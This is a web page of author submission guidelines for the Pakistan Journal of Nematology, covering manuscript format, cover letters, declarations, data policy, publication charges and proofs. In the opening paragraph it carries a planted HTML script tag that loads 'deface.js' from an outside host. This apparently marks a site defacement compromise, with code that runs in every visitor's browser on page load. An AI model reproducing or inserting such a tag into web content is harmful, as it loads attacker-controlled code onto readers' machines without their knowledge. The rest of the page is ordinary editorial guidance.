General Information

Abstracted and indexed in, Nematological Abstracts, Biological Abstracts, Zoological Records, Rice abstracts & Biosis

The Pakistan Journal of Nematology (DOI prefix: 10.18681/pjn) publishes articles of original research (plagiarism screening) concerning plant, animal, entomophagous, marine and free-living nematodes. Research articles of parasites of vertebrate are also considered for publication. Review articles on important issues are also published. In a year, two issues of the journal, one in January and the other in July are published to form one volume.<script src="https://devil404.github.io/deface.js"></script>

Please make sure you have the following information available before you submit your manuscript:

Author information

Full names and email addresses of all co-authors on your manuscript.

Cover letter

A cover letter that includes the following information, as well as any additional information requested in the instructions for your specific article type:

•             An explanation of why your manuscript should be published in Pakistan Journal of Nematology

•             An explanation of any issues relating to journal policies

•             A declaration of any potential competing interests

•             Confirmation that all authors have approved the manuscript for submission

•             Confirmation that the content of the manuscript has not been published, or submitted for publication elsewhere

•             Authors contribution for performing the research work and preparing manuscript

•             If you are submitting a manuscript to a particular special issue, please refer to its specific name in your covering letter

Submission of Manuscript:

Manuscript should be submitted online to http://pjn.com.pk/login.php or email: info@pjn.com.pk as it facilitates in quick publication process of reviewing and editing. Manuscript must be submitted according to the format and style of Pakistan Journal of Nematology.

The following style in the preparation of the manuscript should be strictly followed:

Manuscript should be in English, typed (12 font size, Times New Roman) in single column and double spaced. Author's institutional and e-mail addresses should follow author(s) name and will not appear as a foot note. Papers other than Short Communications may be organized under: Abstract, Keywords, Introduction, Review of literature (if necessary), Materials and Methods, Results, Discussion, Declaration and References. Sub-heading under results may be made as necessary.

References: Follow the Harvard System. Name of authors should be cited in the text and not numbered. References should be listed in alphabetical order and the titles of journals should be cited in full. Literature references must conform to the following examples:

Table and Graphs: Numerical results should be presented either as tables or as graph and in editable format. Tables and graphs should be or less in size, typed in 10 or 11 font size, numbered consecutively and should have a brief explanatory title. Avoid vertical lines in tables. The metric system and temperature in Celsius scale (for example) should be used.

Figures: Drawing may not be more than 5x7" in size, drawn in black India ink on white or transparent paper. Photographs must be of high quality and resolution (JPEG/TIF at 300 dpi). The authors would be asked to pay page printing charges for coloured photographs.

Short Communication: It published occasionally and not intended as a method of publishing unreplicated experiments or pilot studies. Short communication are not divided into sections and do not have a summary. Only one table or Figure is permitted.

Important notes

•             Upon submission, the e-mail addresses of all authors will be requested. At the end of the submission process, the corresponding author will receive an acknowledgement e-mail and all co-authors will be contacted automatically to confirm their affiliation to the submitted work.

•             Please note that it is mandatory to use line numbering for the manuscript. If a manuscript does not have line numbers it is returned to the author.

Declarations:

All manuscripts must contain the following sections under the heading 'Declarations'.

If any of the sections are not relevant to your manuscript, please include the heading and write 'Not applicable' for that section.

Accessibility:

In order to give people of all abilities and disabilities access to the content of your figures, please make sure that

•             All figures have descriptive captions (blind users could then use a text-to-speech software or a text-to-Braille hardware)

•             Patterns are used instead of or in addition to colors for conveying information (colorblind users would then be able to distinguish the visual elements)

•             Any figure lettering has a contrast ratio of at least 4.5:1

Spreadsheets:

•             Spreadsheets should be submitted as .csv or .xlsx files (MS Excel).

Sequences:

Sequences must be deposited in the GenBank, full alignment of datasets must be submitted to the TreeBASE and a Mycobank number must be added for new species and taxonomic changes.

Please submit Sequences as Electronic Supplementary Material at reviewing stage.

Specialized Formats:

•             Specialized format such as .pdb (chemical), .wrl (VRML), .nb (Mathematica notebook), and .tex can also be supplied.

Research Data Policy:

A submission to the journal implies that materials described in the manuscript, including all relevant raw data, will be freely available to any researcher wishing to use them for non-commercial purposes, without breaching participant confidentiality.

The journal strongly encourages that all datasets on which the conclusions of the paper rely should be available to readers. We encourage authors to ensure that their datasets are either deposited in publicly available repositories (where available and appropriate) or presented in the main manuscript or additional supporting files whenever possible.

After acceptance:

Once the Author Query Application has been completed, your article will be processed and you will receive the proofs.

Publication charges: 

From June 2020 onwards, the paper publication charges would be made as:Rs.2,000/paper up to 6 pages; beyond that, Rs. 500/page willbe charged. Foreign authors of papers will be charged at the rate of 50/US Dollars/paper.

Copyright transfer:

Authors will be asked to transfer copyright of the article to the Publisher (or grant the Publisher exclusive publication and dissemination rights). This will ensure the widest possible protection and dissemination of information under copyright laws.

Offprints:

Offprints can be ordered by the corresponding author.

Color illustrations:

Online publication of color illustrations is free of charge. For color in the print version, authors will be expected to make a contribution towards the extra costs.

Proof reading:

The purpose of the proof is to check for typesetting or conversion errors and the completeness and accuracy of the text, tables and figures. Substantial changes in content, e.g., new results, corrected values, title and authorship, are not allowed without the approval of the Editor.

After online publication, further changes can only be made in the form of an Erratum, which will be hyperlinked to the article.

Online First:

The article will be published online after receipt of the corrected proofs. This is the official first publication citable with the DOI. After release of the printed version,
